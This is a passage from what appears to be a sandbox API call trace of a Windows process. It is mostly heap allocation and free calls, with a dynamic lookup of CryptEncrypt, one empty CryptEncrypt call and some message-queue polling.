0x34aa4f0 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x34aa940 [0267.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa940, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.251] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0267.252] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0267.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.260] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 